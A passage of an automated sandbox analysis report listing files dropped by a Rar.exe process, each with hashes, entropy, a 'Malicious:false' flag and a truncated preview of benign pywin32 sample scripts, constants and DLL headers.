                                                                                                                                                                                      Preview:# A sample shell copy hook...# To demostrate:.# * Execute this script to register the context menu..# * Open Windows Explorer.# * Attempt to move or copy a directory..# * Note our hook's dialog is displayed...import pythoncom.import win32con.import win32gui.from win32com.shell import shell, shellcon...# Our shell extension..class ShellExtension:. _reg_progid_ = "Python.ShellExtension.CopyHook". _reg_desc_ = "Python Sample Shell Extension (copy hook)". _reg_clsid_ = "{1845b6ba-2bbd-4197-b930-46d8651497c1}". _com_interfaces_ = [shell.IID_ICopyHook]. _public_methods_ = ["CopyCallBack"].. def CopyCallBack(self, hwnd, func, flags, srcName, srcAttr, destName, destAttr):. # This function should return:. # IDYES Allows the operation.. # IDNO Prevents the operation on this folder but continues with any other operations that have been approved (for example, a batch copy operation).. # IDCANCEL Prevents the current operation and cancels any pending op
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7623
                                                                                                                                                                                      Entropy (8bit):4.620295981351384
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Uid7werOHLhcMP6HUcwT9r9vLDQ/SXDGR:U47OHljyHUc0m
                                                                                                                                                                                      MD5:99C937BF8A9C575A44A8E1C958996FB8
                                                                                                                                                                                      SHA1:198BEF472D43D41BF806EAD6C36E7D972612A86D
                                                                                                                                                                                      SHA-256:47BAA5C72278AE161532D3F9D0EF7B41F1878E705BA366FA76B8751C0CAF4401
                                                                                                                                                                                      SHA-512:2FFE7892CFA233C5CC63073B7EC466718C115826220C5A86729685FE0E852517AC1DD1A374F49915CD864BE2CFFCC62F48537118D92905D3F0E9AF7BD9814938
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample implementation of IEmptyVolumeCache - see.# http://msdn2.microsoft.com/en-us/library/aa969271.aspx for an overview..#.# * Execute this script to register the handler.# * Start the "disk cleanup" tool - look for "pywin32 compiled files".import os.import stat.import sys..import pythoncom.import win32gui.import winerror.from win32com.server.exception import COMException.from win32com.shell import shell, shellcon..# Our shell extension..IEmptyVolumeCache_Methods = (. "Initialize GetSpaceUsed Purge ShowProperties Deactivate".split().).IEmptyVolumeCache2_Methods = "InitializeEx".split()..ico = os.path.join(sys.prefix, "py.ico").if not os.path.isfile(ico):. ico = os.path.join(sys.prefix, "PC", "py.ico").if not os.path.isfile(ico):. ico = None. print("Can't find python.ico - no icon will be installed")...class EmptyVolumeCache:. _reg_progid_ = "Python.ShellExtension.EmptyVolumeCache". _reg_desc_ = "Python Sample Shell Extension (disk cleanup)". _reg_clsid_ = "{E
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29247
                                                                                                                                                                                      Entropy (8bit):4.938884861532685
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:9/LNWrPPPcqJWEyGdnY3T4g83LE+i3S0SzMp1DzQzNc2JY2IoeYaV8DRdOXHgcfX:9/LNWrPvWIYEspEJnDegcf9FxTVT
                                                                                                                                                                                      MD5:0E71355BB9312A57448321D14BF6A53A
                                                                                                                                                                                      SHA1:BE142CBF9C2026CD65B869C67FB9E00DBFE44D60
                                                                                                                                                                                      SHA-256:7505ACB133C8815E2654024CA06034269EAE8932B8DC4F958658763BE9A6A715
                                                                                                                                                                                      SHA-512:DADBA748D6B65E8C339EADD94BFFCCB346DBE8164AC28493856E65CD94E19BCD250C8105BB8BAFBED5235EDBF4D6E86076B155C9E42B02D8FE6303326BCA6CC1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a port of the Vista SDK "FolderView" sample, and associated.# notes at http://shellrevealed.com/blogs/shellblog/archive/2007/03/15/Shell-Namespace-Extension_3A00_-Creating-and-Using-the-System-Folder-View-Object.aspx.# A key difference to shell_view.py is that this version uses the default.# IShellView provided by the shell (via SHCreateShellFolderView) rather.# than our own..# XXX - sadly, it doesn't work quite like the original sample. Oh well,.# another day....import os.import pickle.import random.import sys..import commctrl.import pythoncom.import win32api.import win32con.import winerror.import winxpgui as win32gui # the needs vista, let alone xp!.from win32com.axcontrol import axcontrol # IObjectWithSite.from win32com.propsys import propsys.from win32com.server.exception import COMException.from win32com.server.util import NewEnum as _NewEnum, wrap as _wrap.from win32com.shell import shell, shellcon.from win32com.util import IIDToInterfaceName..GUID = pythoncom.MakeII
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2550
                                                                                                                                                                                      Entropy (8bit):4.94557116783642
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:c/h/XT3050g11VjKc2Kcbis2CyvUV46hfKTt6XPDvI/uXwXwGR:cVXj050g11V2cqeN3vUV4qyJ4PDQ/uXg
                                                                                                                                                                                      MD5:1CECD9EEC5CEC1055C24FFC54DFC5328
                                                                                                                                                                                      SHA1:111E67D9EB7A37224EFA5FB38A0744AB25184C9F
                                                                                                                                                                                      SHA-256:8D581DD890F7B32A507C71F73629C1ABF19D96A41BF1124354BCC32F958159B3
                                                                                                                                                                                      SHA-512:2EDAFBCCA344D037D6FCBBB53F3C35EE0A7688F52CB7BE091739B983CC4106BA9864AA3FD3807C33E817C35594B33F6D051A8186A7F53CACF64F1ED6D8B9E5AE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample icon handler. Sets the icon for Python files to a random.# ICO file. ICO files are found in the Python directory - generally there will.# be 3 icons found..#.# To demostrate:.# * Execute this script to register the context menu..# * Open Windows Explorer, and browse to a directory with a .py file..# * Note the pretty, random selection of icons!.# Use glob to locate ico files, and random.choice to pick one..import glob.import os.import random.import sys..import pythoncom.import win32gui.import winerror.from win32com.shell import shell, shellcon..ico_files = glob.glob(os.path.join(sys.prefix, "*.ico")).if not ico_files:. ico_files = glob.glob(os.path.join(sys.prefix, "PC", "*.ico")).if not ico_files:. print("WARNING: Can't find any icon files")..# Our shell extension..IExtractIcon_Methods = "Extract GetIconLocation".split().IPersistFile_Methods = "IsDirty Load Save SaveCompleted GetCurFile".split()...class ShellExtension:. _reg_progid_ = "Python.ShellExtension.IconH
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37215
                                                                                                                                                                                      Entropy (8bit):4.690608193285492
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:r+nnu3b7vrZjIxedwJrb0cjKdkzi3FIV6g/HSBo+OVFnnMStl:r+nu3XaxedArYcjKdkzRD/Heo+Ottl
                                                                                                                                                                                      MD5:697E8D44C0EE4041BC79C33A17B228AA
                                                                                                                                                                                      SHA1:D2541E30F9FC436C6AFB07F3883517726248F153
                                                                                                                                                                                      SHA-256:A9DA5A6CCA9AAC3D03152A3D5B6330194921681960B7502CF96E84B1A323BC97
                                                                                                                                                                                      SHA-512:99B986AB15DAF751D90E7469D57631147DAF2DA8973442E094855B797394D59C0E2A031FAB6FA5EEA8A00701E104CF47E7AE3F8DF0FA8EC49F1573E7966794BB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A sample shell namespace view..# To demostrate:.# * Execute this script to register the namespace..# * Open Windows Explorer, and locate the new "Python Path Shell Browser".# folder off "My Computer".# * Browse this tree - .py files are shown expandable, with classes and.# methods selectable. Selecting a Python file, or a class/method, will.# display the file using Scintilla..# Known problems:.# * Classes and methods don't have icons - this is a demo, so we keep it small.# See icon_handler.py for examples of how to work with icons..#.#.# Notes on PIDLs.# PIDLS are complicated, but fairly well documented in MSDN. If you need to.# do much with these shell extensions, you must understand their concept..# Here is a short-course, as it applies to this sample:.# A PIDL identifies an item, much in the same way that a filename does.# (however, the shell is not limited to displaying "files")..# An "ItemID" is a single string, each being an item in the hierarchy..# A "PIDL" is a list
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):470
                                                                                                                                                                                      Entropy (8bit):4.979151668013883
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:4Lm4hhIVQhxqQPGfDwbymXNB2kd6ChoBJ9o6wi1Ta+EfZ2plPPv:v8IVw2ayqZdJyBJ9oSfEoplf
                                                                                                                                                                                      MD5:E847821591C91355F1ABCAD2BC14ED89
                                                                                                                                                                                      SHA1:A01B49F131FA10A07D8C48B2E298CBE7D6022BA2
                                                                                                                                                                                      SHA-256:5A1AC89AD95E161C7E4DFC3A9A3A5C6F8B9E00478998B9FB2583C01ADF262763
                                                                                                                                                                                      SHA-512:90DC99086B780C371837EC78232B57530E27301B4270296F99A6FE33199C1C532B1E0D67F6EF7FC99344AB6F3DA2817E48A789A41D33E871C60C51D071FC5601
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32con.from win32com.shell import shell, shellcon...def ExplorePIDL():. pidl = shell.SHGetSpecialFolderLocation(0, shellcon.CSIDL_DESKTOP). print("The desktop is at", shell.SHGetPathFromIDList(pidl)). shell.ShellExecuteEx(. fMask=shellcon.SEE_MASK_NOCLOSEPROCESS,. nShow=win32con.SW_NORMAL,. lpClass="folder",. lpVerb="explore",. lpIDList=pidl,. ). print("Done!")...if __name__ == "__main__":. ExplorePIDL().
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2318
                                                                                                                                                                                      Entropy (8bit):4.559422897162152
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:krswmghjVif3aeg3GxMLniuIQSERu7YB06QKUenpB/vm7tLnWIQSKnGCPcV:CmghjVif3dxMLn/8s5QKUo/vm5LnwqCC
                                                                                                                                                                                      MD5:5E1EA5F5941BDC53352F26ED5C5ABDC1
                                                                                                                                                                                      SHA1:F0B88CCA4B5962FFBD1F768181BC1EF1910FC3C1
                                                                                                                                                                                      SHA-256:14006951D85CA90B277C1FFB763BE3FA736641FD9864A6E619900A471AC130CE
                                                                                                                                                                                      SHA-512:9A79C0AD4134337F4519C140C7404596784FC8427442C0777216F8EEC4109BB248B2F3AC2FD1E9F5163B2F9FF7AE412258BDAE32A7E478C92CB8E338761B0440
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Demonstrates how to propagate a folder's view state to all its subfolders.The format of the ColInfo stream is apparently undocumented, but.it can be read raw from one folder and copied to another's view state.."""..import os.import sys..import pythoncom.from win32com.shell import shell, shellcon..template_folder = os.path.split(sys.executable)[0].print("Template folder:", template_folder).template_pidl = shell.SHILCreateFromPath(template_folder, 0)[0].template_pb = shell.SHGetViewStatePropertyBag(. template_pidl,. "Shell",. shellcon.SHGVSPB_FOLDERNODEFAULTS,. pythoncom.IID_IPropertyBag,.)..# Column info has to be read as a stream.# This may blow up if folder has never been opened in Explorer and has no ColInfo yet.template_iunk = template_pb.Read("ColInfo", pythoncom.VT_UNKNOWN).template_stream = template_iunk.QueryInterface(pythoncom.IID_IStream).streamsize = template_stream.Stat()[2].template_colinfo = template_stream.Read(streamsize)...def update_colinfo(not_used, di
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):669
                                                                                                                                                                                      Entropy (8bit):4.4561315141191296
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:kIj2QpxXhhIVQhxrtKlw+JwLHZhTMBuLFCERTJqllGL8gJ2IT2WVtppbj:kk1IVw5KYLvguLFPRQGLx4+vbZj
                                                                                                                                                                                      MD5:4391682FCB87F8669A3B9141B42681DF
                                                                                                                                                                                      SHA1:C368535BF2989C4734E885F1070F67D0A3F3700E
                                                                                                                                                                                      SHA-256:617503784C0BF008A40515717BEFD8823A6C3D686D002EDD3167352EDDDF9D3B
                                                                                                                                                                                      SHA-512:C654B53FE020A44C66F2571085E5C2A5FB7A5153174BDBF4385927CD76C1AD25CEE6B52F7D868607A4613F2FAC767E44C1FD2AC4C3718EC49377F891E8A6003A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# A little sample that walks from the desktop into child.# items..from win32com.shell import shell, shellcon...def walk(folder, depth=2, indent=""):. try:. pidls = folder.EnumObjects(0, shellcon.SHCONTF_FOLDERS). except shell.error:. # no items. return. for pidl in pidls:. dn = folder.GetDisplayNameOf(pidl, shellcon.SHGDN_NORMAL). print(indent, dn). if depth:. try:. child = folder.BindToObject(pidl, None, shell.IID_IShellFolder). except shell.error:. pass. else:. walk(child, depth - 1, indent + " ")...walk(shell.SHGetDesktopFolder()).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):407552
                                                                                                                                                                                      Entropy (8bit):6.703998786147557
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6144:BVYMO0FDXfNr9YIZdJ5dgUV/6lRjiZPUDGr/ti/Ah:Rp97JaI
                                                                                                                                                                                      MD5:57A6C3C480A7B994DB367739652CD37C
                                                                                                                                                                                      SHA1:6B776244197E13609D02704576FA693A808D651E
                                                                                                                                                                                      SHA-256:909AAE7180329F4297111D29966CA6C73C0354540BE62D68B00072712508210D
                                                                                                                                                                                      SHA-512:D043F1760027544A8319693121AE46F93383AE051ABD1C556779223EBB4014ED40553E69272F50C1A45CB39E5DB7A20C84D37FD4025FCC7F21DDD841CE5CFC49
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W...............................................s............................."......................Rich...........PE..L......d...........!................Xl....................................................@..........................W..L....W..........L...........................D...T...............................@............................................text...{........................... ..`.rdata..............................@..@.data... o.......8...h..............@....rsrc...L...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):49361
                                                                                                                                                                                      Entropy (8bit):5.4774347642005035
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:rWkQM9PBIng17jfIxmtcOfby7OCKO9rqLCGYNTLa/mo2j95z9BPvVdDV+aiVrBrn:rRvHQ2BtbiOCO4PvD0aiVrxtolEtf
                                                                                                                                                                                      MD5:D91E3C8D5BA6BEFA1E32B8854681545A
                                                                                                                                                                                      SHA1:1FE0190385E16A9A8CD5F26C0AE45CECC09E3D23
                                                                                                                                                                                      SHA-256:21E5294BCF830F00B4FAB35E3BB0AC65040979A17EC0DDD7E71830FA6BA4A151
                                                                                                                                                                                      SHA-512:E5FFA245D8096A1D070B2FBEEED7D354A476070CD1A0A15ED382B899E9CB2EA59A6E00836ECE568C060386EE53E533775031F9AC5767A59EC2CF5826E1F3999E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from \mssdk\include\shlobj.h and shellapi.h.WM_USER = 1024.DROPEFFECT_NONE = 0.DROPEFFECT_COPY = 1.DROPEFFECT_MOVE = 2.DROPEFFECT_LINK = 4.DROPEFFECT_SCROLL = -2147483648..FO_MOVE = 1.FO_COPY = 2.FO_DELETE = 3.FO_RENAME = 4..## File operation flags used with shell.SHFileOperation.FOF_MULTIDESTFILES = 1.FOF_CONFIRMMOUSE = 2.FOF_SILENT = 4.FOF_RENAMEONCOLLISION = 8.FOF_NOCONFIRMATION = 16.FOF_WANTMAPPINGHANDLE = 32.FOF_ALLOWUNDO = 64.FOF_FILESONLY = 128.FOF_SIMPLEPROGRESS = 256.FOF_NOCONFIRMMKDIR = 512.FOF_NOERRORUI = 1024.FOF_NOCOPYSECURITYATTRIBS = 2048.FOF_NORECURSION = 4096.FOF_NO_CONNECTED_ELEMENTS = 8192.FOF_WANTNUKEWARNING = 16384.FOF_NORECURSEREPARSE = 32768.FOF_NO_UI = FOF_SILENT | FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_NOCONFIRMMKDIR..## Extended file operation flags, used with IFileOperation.FOFX_NOSKIPJUNCTIONS = 0x00010000.FOFX_PREFERHARDLINK = 0x00020000.FOFX_SHOWELEVATIONPROMPT = 0x00040000.FOFX_EARLYFAILURE = 0x00100000.FOFX_PRESERVEFILEEXTENSIONS =
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2092
                                                                                                                                                                                      Entropy (8bit):4.672051600836994
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:oVvqtFCv3PFuJv3Ny5sbEYO3FCv3PY3cJ7CgEfpPeJX:oV8Cv3PFokgqCv3PY37gEVC
                                                                                                                                                                                      MD5:860B68CEEFE01EBF3172AC16EAFEBC8B
                                                                                                                                                                                      SHA1:5E39F0FF2A62C3F05C7DB20D4B4D269B720E9D1E
                                                                                                                                                                                      SHA-256:E76D257B02B747C6C36EC85EC4B7BF086895BA4FF90C366716E2C0462291082B
                                                                                                                                                                                      SHA-512:6A1C0A5E8324AAF1796C3B3F4E5DB5FD1B82B8FAEC60229377D60E0296BC2C3A56E5BDDD733C202D3FA769B55E79BB929909EF47418EDC06DE975546DE9D5EDF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import win32api.from win32com.shell import shell, shellcon...def testSHFileOperation(file_cnt):. temp_dir = os.environ["temp"]. orig_fnames = [. win32api.GetTempFileName(temp_dir, "sfo")[0] for x in range(file_cnt). ]. new_fnames = [. os.path.join(temp_dir, "copy of " + os.path.split(orig_fnames[x])[1]). for x in range(file_cnt). ].. pFrom = "\0".join(orig_fnames). pTo = "\0".join(new_fnames).. shell.SHFileOperation(. (. 0,. shellcon.FO_MOVE,. pFrom,. pTo,. shellcon.FOF_MULTIDESTFILES | shellcon.FOF_NOCONFIRMATION,. ). ). for fname in orig_fnames:. assert not os.path.isfile(fname).. for fname in new_fnames:. assert os.path.isfile(fname). shell.SHFileOperation(. (. 0,. shellcon.FO_DELETE,. fname,. None,. shellcon.FOF_NOCONFIRMATION | shellcon.FOF_NOE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):582
                                                                                                                                                                                      Entropy (8bit):5.0916106849298854
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1KhhIVQhT4hPcnbwTmPmDJDw+Q1oB2CY62dpT4r5pq5zKq5lIjWEvSalX9vhSRL4:16IVkbUmudDwfo4T6UxJjTab5SZxq
                                                                                                                                                                                      MD5:9C32B68A70FFACC40DC0B035437EC4F5
                                                                                                                                                                                      SHA1:35693171E5D23088E042735AA5FEC02F57365295
                                                                                                                                                                                      SHA-256:D9516D3471E7EB9FBD3B5DC921FB9711AA2ED16C8EC1BB0BFC973D024C8A2649
                                                                                                                                                                                      SHA-512:92B01330F1DAD4CA5E3DCA62013F817A2C139ADE275052CEFD6DB5A4CAFAF59374219A9567A0521715B081F0BE02091D84A0E42B8720AEAE4F67477B9D33BA5E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from win32com.shell import shell.from win32com.shell.shellcon import *..sf = shell.SHGetDesktopFolder().print("Shell Folder is", sf)..names = [].for i in sf: # Magically calls EnumObjects. name = sf.GetDisplayNameOf(i, SHGDN_NORMAL). names.append(name)..# And get the enumerator manually.enum = sf.EnumObjects(0, SHCONTF_FOLDERS | SHCONTF_NONFOLDERS | SHCONTF_INCLUDEHIDDEN).num = 0.for i in enum:. num += 1.if num != len(names):. print("Should have got the same number of names!?").print("Found", len(names), "items on the desktop").for name in names:. print(name).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2891
                                                                                                                                                                                      Entropy (8bit):4.819588436655301
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:QTdLIVUWsF6TI8V/I8VwayLWnq7cAN2nV4ah0NwFn0L9I8TKay7W0ng441GpL9N/:K8VjsF4lRlZyEAR2+l1yIBCTemJy3fS
                                                                                                                                                                                      MD5:D038D3E80DA35B8BFB6E0260AAE3EA65
                                                                                                                                                                                      SHA1:9B11D9E41F1D2AFADA8FDAA442495F24C76E07CA
                                                                                                                                                                                      SHA-256:F3B9315D2A7593F318E80DB2D26A9EA34BD740F1DD0B0B2BE636F87DDCF1E7A4
                                                                                                                                                                                      SHA-512:0FFC7D1CA7A4E578B7BFAE801A21309F5B1474C8450FBFED193D9720DAD5DD441C3F35E7BB0D04377FF2F0AA08DCF58BE0E4288743F2ED559F7C661EA7152D41
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Test IShellItem and related interfaces.import unittest..from win32com.shell import knownfolders, shell, shellcon...class TestShellItem(unittest.TestCase):. def assertShellItemsEqual(self, i1, i2):. n1 = i1.GetDisplayName(shellcon.SHGDN_FORPARSING). n2 = i2.GetDisplayName(shellcon.SHGDN_FORPARSING). self.assertEqual(n1, n2).. def test_idlist_roundtrip(self):. pidl = shell.SHGetSpecialFolderLocation(0, shellcon.CSIDL_DESKTOP). item = shell.SHCreateItemFromIDList(pidl, shell.IID_IShellItem). pidl_back = shell.SHGetIDListFromObject(item). self.assertEqual(pidl, pidl_back).. def test_parsing_name(self):. sf = shell.SHGetDesktopFolder(). flags = shellcon.SHCONTF_FOLDERS | shellcon.SHCONTF_NONFOLDERS. children = sf.EnumObjects(0, flags). child_pidl = next(children). name = sf.GetDisplayNameOf(child_pidl, shellcon.SHGDN_FORPARSING).. item = shell.SHCreateItemFromParsingName(name, None, shell.I
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):192
                                                                                                                                                                                      Entropy (8bit):4.73288878491099
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:SbFVEbW2llQkEr66FuxAAyWX7myhAgMXFPJoFcAtUIVKzLHKFaWlQkEr66NRS66u:SbFubDlQkDAAyWrNhS5WmKVsLHKkWlQp
                                                                                                                                                                                      MD5:3D90A8BDF51DE0D7FAE66FC1389E2B45
                                                                                                                                                                                      SHA1:B1D30B405F4F6FCE37727C9EC19590B42DE172EE
                                                                                                                                                                                      SHA-256:7D1A6FE54DC90C23B0F60A0F0B3F9D5CAE9AC1AFECB9D6578F75B501CDE59508
                                                                                                                                                                                      SHA-512:BD4EA236807A3C128C1EC228A19F75A0A6EF2B29603C571EE5D578847B20B395FEC219855D66A409B5057B5612E924EDCD5983986BEF531F1309ABA2FE7F0636
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a python package.# __PackageSupportBuildPath__ not needed for distutil based builds,.# but not everyone is there yet..import win32com..win32com.__PackageSupportBuildPath__(__path__).
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):38912
                                                                                                                                                                                      Entropy (8bit):6.209295804436407
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:swC2/RCOlDHjjRstec837jzH5hSXJMGmsI77Q:tFt/itecmHLmWGmn77Q
                                                                                                                                                                                      MD5:57BDBDA66860FD7D36C6FBB55A9A37A5
                                                                                                                                                                                      SHA1:A9EC10549864C9B94CED55CB7E1FCA01BEF53758
                                                                                                                                                                                      SHA-256:FF483CC27CE94EE7BFC17256888E2BF6EF6951CBACEC28EB31AE8529C61E0F27
                                                                                                                                                                                      SHA-512:B3241E06A4CCB8E7AA74373CECC106635A8E5750A89146E105DAE34B4C437BC8254AA4AC3DEA1F823A8EED8E222E8F1DD91B42B29E3A8118FB1256D624929F4B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%...Dw..Dw..Dw..<..Dw..1v..Dw..1r..Dw..1s..Dw..1t..Dw.{-v..Dw..1v..Dw../v..Dw..Dv..Dw../p..Dw..1~..Dw..1w..Dw..1u..Dw.Rich.Dw.........PE..L......d...........!.....J...J......9J.......`............................................@.............................p...............l............................y..T...........................Xy..@............`...............................text....I.......J.................. ..`.rdata...1...`...2...N..............@..@.data...............................@....rsrc...l...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2212
                                                                                                                                                                                      Entropy (8bit):5.260377440140583
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:ZGXN+o5dmgEIDuOHcmCoKda+gj9Hpppg8UZV1S0zmIQ6:ZG9r5dmgFDuO8mCfI+gRJppgzo0E6
                                                                                                                                                                                      MD5:679BFEFC3ED4A729A42B80D0281C5501
                                                                                                                                                                                      SHA1:6C27A02D21C8C28378AAA4E0F376C53BE6054637
                                                                                                                                                                                      SHA-256:1928FE18B0131BC8930E2D751952CB446F8E20A8DD3FC5118BF4848784452F2B
                                                                                                                                                                                      SHA-512:7B844350AC794D4DB83A719BF83DC12A355A0731A693037D82A0CC7133BD3C531B679BE9D76C20AB157D3CC2D1A5CEB85730856B2E7DE4C54AF25A1265B883E3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os.import sys.import time..import pythoncom.import win32api.from win32com.taskscheduler import taskscheduler..task_name = "test_addtask.job".ts = pythoncom.CoCreateInstance(. taskscheduler.CLSID_CTaskScheduler,. None,. pythoncom.CLSCTX_INPROC_SERVER,. taskscheduler.IID_ITaskScheduler,.).tasks = ts.Enum().for task in tasks:. print(task).if task_name in tasks:. print("Deleting existing task " + task_name). ts.Delete(task_name)..t = ts.NewWorkItem(task_name).t.SetComment("rude comments").t.SetApplicationName(sys.executable).t.SetPriority(taskscheduler.REALTIME_PRIORITY_CLASS).t.SetParameters(. "-c\"import win32ui,time;win32ui.MessageBox('hey bubba I am running');\"".).t.SetWorkingDirectory(os.path.dirname(sys.executable)).t.SetCreator("test_addtask.py").t.SetMaxRunTime(20000) # milliseconds.t.SetFlags(. taskscheduler.TASK_FLAG_INTERACTIVE | taskscheduler.TASK_FLAG_RUN_ONLY_IF_LOGGED_ON.).## |taskscheduler.TASK_FLAG_DELETE_WHEN_DONE) #task
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2154
                                                                                                                                                                                      Entropy (8bit):5.225976928607513
                                                                                                                                                                                      Encrypted:false
